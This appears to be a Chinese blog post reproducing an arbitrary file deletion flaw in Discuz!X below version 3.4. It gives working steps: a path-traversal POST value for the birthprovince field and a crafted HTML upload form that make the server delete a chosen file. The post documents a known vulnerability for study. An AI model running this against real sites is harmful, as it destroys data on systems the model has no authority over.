Discuz!X前臺任意文件刪除漏洞重現

原創

2020-02-25 14:18

漏洞影響了Discuz 3.4 以下的所有版本。
該漏洞存在於upload/source/include/spacecp/spacecp_profile.php，文件中的submitcheck()函數。成功上傳文件會跳轉執行unlink這個函數。

1.進入設置-個人資料，先在頁面源代碼找到formhash值，可以看到值爲2599b5e5

2.開啓一個插件Hackbar
Post數據：birthprovince=../../../importantfile.txt&profilesubmit=1&formhash=2599b5e5

執行後會顯示一片空白，你再刷新下或重新訪問下就好了。

3.出生地被修改成要刪除的文件。
最後構造表單執行刪除文件

<form
action="http://192.168.199.217/home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovince]=aaaaaa" method="POST" enctype="multipart/form-data">
<input type="file" name="birthprovince" id="file" />
<input type="text" name="formhash" value="720c16c3"/></p>
<input type="text" name="profilesubmit" value="1"/></p>
<input type="submit" value="Submit" />
</from>

生成.html，上面的需要自己修改。
4.然後隨便上傳一張圖片，就能刪除自己要刪除的。

5.再訪問回去看一下。

發表評論

所有評論

還沒有人評論，想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.

Discuz!X前臺任意文件刪除漏洞重現

致遠OA及相關OA系統集成與二次開發

EXCEL公式使用總結

System.Object未被引用的程序集中定義

Java 信號量（semaphore）搭配CountDownLatch 實現多線程處理循環內邏輯並限制創建線程數

【面試準備】項目經驗——接口自動化項目

Django debug page XSS漏洞（CVE-2017-12794）

Discuz!X前臺任意文件刪除漏洞重現

Vulhub-EVM1靶機

VulnHub測試靶場DC-1

VulnHub***測試靶場Breach 1.0

https://yachay.unat.edu.pe/blog/index.php?comment_area=format_blog&comment_component=blog&comment_co

linux以太網驅動總結